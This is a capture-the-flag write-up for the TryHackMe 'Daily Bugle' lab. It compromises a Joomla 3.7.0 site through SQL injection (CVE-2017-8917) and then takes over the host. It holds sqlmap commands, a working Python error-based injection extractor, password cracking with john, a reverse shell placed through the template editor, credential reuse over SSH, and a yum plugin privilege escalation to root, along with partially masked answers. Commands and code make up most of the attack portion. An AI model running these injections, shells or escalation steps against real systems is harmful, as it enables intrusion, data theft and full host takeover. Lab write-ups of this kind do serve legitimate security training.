Complete TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle is a challenge in which you compromise a Joomla CMS account via SQL injection, practice cracking password hashes, and escalate privileges by abusing sudo rights on yum.

Difficulty: Hard

Daily Bugle WriteUp

Access the web server, who robbed the bank?

Scan Target Machine with Nmap

nmap -sV -sC --script=vuln  10.10.155.246

Find Joomla Version

Nmap already reports the Joomla version, but if you need to confirm it manually, the README and the core manifest both state it:

wget http://10.10.204.53/README.txt
wget http://10.10.204.53/administrator/manifests/files/joomla.xml

Crack Jonah's Password

Crack the hash? But where is the hash?

We have Joomla CMS 3.7.0 and Nmap tells us there is a public exploit for it, so let's search for it:

searchsploit joomla 3.7.0

Great, we find one (EDB-ID 42033, CVE-2017-8917) that exploits an SQL injection in a single vulnerable parameter, list[fullordering] of the com_fields component.

Copy the exploit to the current directory and read it:

searchsploit -m 42033.txt
less /root/42033.txt

SQLMap Command

Enumerate All Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Select the joomla Database (--hex makes sqlmap retrieve data hex-encoded, which avoids character-set problems with the error-based technique)

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hex

Read Tables from Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex

We have 72 tables; which one holds the users?

Let's dump the #__users table, hoping to find Jonah's password hash:

Extract data from #__users tables

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex
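The room's hint on the last question suggests doing this without sqlmap. As an added example (not part of this write-up or of EDB-42033), here is a small Python helper that drives the same list[fullordering] parameter with an error-based updatexml() payload and parses the leaked value out of the "XPATH syntax error" message Joomla echoes back. The 31-character window (MySQL truncates the echoed expression to 32 characters), the '~' sentinel, and the query for jonah's row are my assumptions; FakeJoomla and FAKE_HASH are constructed stand-ins so the code runs offline, not the room's real hash.

```python
"""Error-based extraction through the Joomla 3.7.0 com_fields injection.

Added example, not code from the original write-up or from EDB-42033. It
builds the same request sqlmap sends (parameter list[fullordering]) with a
hand-made updatexml() payload and parses the leaked chunk from the error page.
"""
import html
import re
from urllib.parse import urlencode

# MySQL echoes the malformed XPath expression inside
#   XPATH syntax error: '<expr>'
# but truncates <expr> to 32 characters, so one request leaks at most 31
# characters of data plus a one-character sentinel. The sentinel ('~', 0x7e)
# guarantees the expression is never valid XPath and lets the parser tell our
# leak apart from an unrelated SQL error.
SENTINEL = "~"
CHUNK = 31
BASE = "http://10.10.204.53"  # target used throughout the write-up


def build_payload(query: str, offset: int) -> str:
    """updatexml() payload leaking CHUNK chars of `query`'s single-row result,
    starting at 1-based `offset` (MySQL SUBSTRING semantics)."""
    return (f"updatexml(0x23,concat(0x{ord(SENTINEL):02x},"
            f"substring(({query}),{offset},{CHUNK})),1)")


def build_url(base: str, query: str, offset: int) -> str:
    """Same endpoint the sqlmap commands use; the payload goes in list[fullordering]."""
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": build_payload(query, offset),
    }
    return f"{base}/index.php?" + urlencode(params, safe="(),")


ERROR_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def extract_chunk(body: str):
    """Return the leaked chunk from one response, '' when the window is past
    the end of the data, or None when no updatexml() error is present."""
    # Joomla renders the exception through htmlspecialchars(ENT_QUOTES), so the
    # quotes normally arrive as &#039;; unescape before matching.
    m = ERROR_RE.search(html.unescape(body))
    if not m or not m.group(1).startswith(SENTINEL):
        return None
    return m.group(1)[len(SENTINEL):]


def extract_all(fetch, base: str, query: str) -> str:
    """Walk the result in CHUNK-sized windows until a short or empty one."""
    out, offset = "", 1
    while True:
        chunk = extract_chunk(fetch(build_url(base, query, offset)))
        if not chunk:
            break
        out += chunk
        if len(chunk) < CHUNK:
            break
        offset += CHUNK
    return out


class FakeJoomla:
    """Constructed stand-in for the vulnerable host (not a real server): answers
    each URL with the error page MySQL/Joomla would produce for that window."""
    WINDOW_RE = re.compile(r"substring\(\(.*?\),(\d+),(\d+)\)")

    def __init__(self, secret: str):
        self.secret = secret

    def __call__(self, url: str) -> str:
        m = self.WINDOW_RE.search(url)
        if not m:
            return "<html><body>Fields</body></html>"  # no injection: normal page
        start, length = int(m.group(1)) - 1, int(m.group(2))
        leaked = SENTINEL + self.secret[start:start + length]
        return ("<html><body><h1>500 - An error has occurred.</h1>"
                f"<p>XPATH syntax error: &#039;{leaked[:32]}&#039;</p>"
                "</body></html>")


# Constructed 60-character bcrypt-shaped value standing in for jonah's hash;
# it is NOT the room's real hash.
FAKE_HASH = "$2y$10$" + "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ"
JONAH_QUERY = "select password from `#__users` where username='jonah'"

if __name__ == "__main__":
    print(build_url(BASE, JONAH_QUERY, 1))
    print(extract_all(FakeJoomla(FAKE_HASH), BASE, JONAH_QUERY))
```

Against a live target you would replace FakeJoomla with a function that performs the HTTP GET and returns the body; everything else, including the 32-character truncation and the HTML-escaped quotes, is handled by extract_chunk and extract_all.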

Crack Jonah's Password Hash

Save the hash from the dump to jonah_hash.txt (Joomla 3 stores bcrypt hashes, which john detects automatically) and run it against rockyou:

john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txt
john jonah_hash.txt --show

Log in to Joomla Administration as Jonah

http://10.10.204.53/administrator
username - jonah
password - cracked from Hash

Upload Reverse Shell to Joomla

http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D

Through the template editor (the file parameter is the base64 of /index.php) we replace the template's index.php with a PHP reverse shell, save it, and request a page rendered by that template while a listener waits on our machine. Once the shell calls back, check where we landed:

pwd

Investigate File System

First let’s investigate the Joomla folder

cd /var/www/html
ls -la

Great, configuration.php gives us the MySQL root password. Let's check whether the MySQL daemon runs as root:

ps aux | grep mysql

No luck, the MySQL service runs as the mysql user.

What if the user jjameson reuses the MySQL root password?

Let's try an SSH connection as jjameson with that password:

ssh jjameson@10.10.204.53

Find User Flag

Elevate Privileges from JJameson user to Root

sudo -l

As we can see, jjameson can run yum with sudo. GTFOBins documents how to abuse that: yum loads Python plugins from a config we control, so a plugin that execs a shell runs as root.

cd /tmp
# Throwaway directory for the yum config, plugin config and plugin (GTFOBins technique)
RFS=$(mktemp -d)
# Minimal yum.conf: enable plugins and point both plugin paths at our directory
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
# Plugin config: yum looks for <plugin name>.conf and requires enabled=1
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
# The plugin itself: init_hook fires before any package work, so this
# replaces the root yum process with /bin/sh
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

# -c uses our config instead of /etc/yum.conf; --enableplugin=y activates the y plugin
sudo yum -c $RFS/x --enableplugin=y

Answer the questions below

What is the Joomla version?

3.7.0

*Instead of using SQLMap, why not use a python script!*

What is Jonah’s cracked password?

spider*RFS*

What is the user flag?

27a260fe3cba712cfde*RFS*

What is the root flag?

eec3d53292b1821868*RFS*

GTFOBins

Exploit Joomla 3.7.0

Room name: Daily Bugle
OS: Linux
Difficulty: Hard
Room Link: tryhackme.com/room/dailybugle
Creator: TryHackMe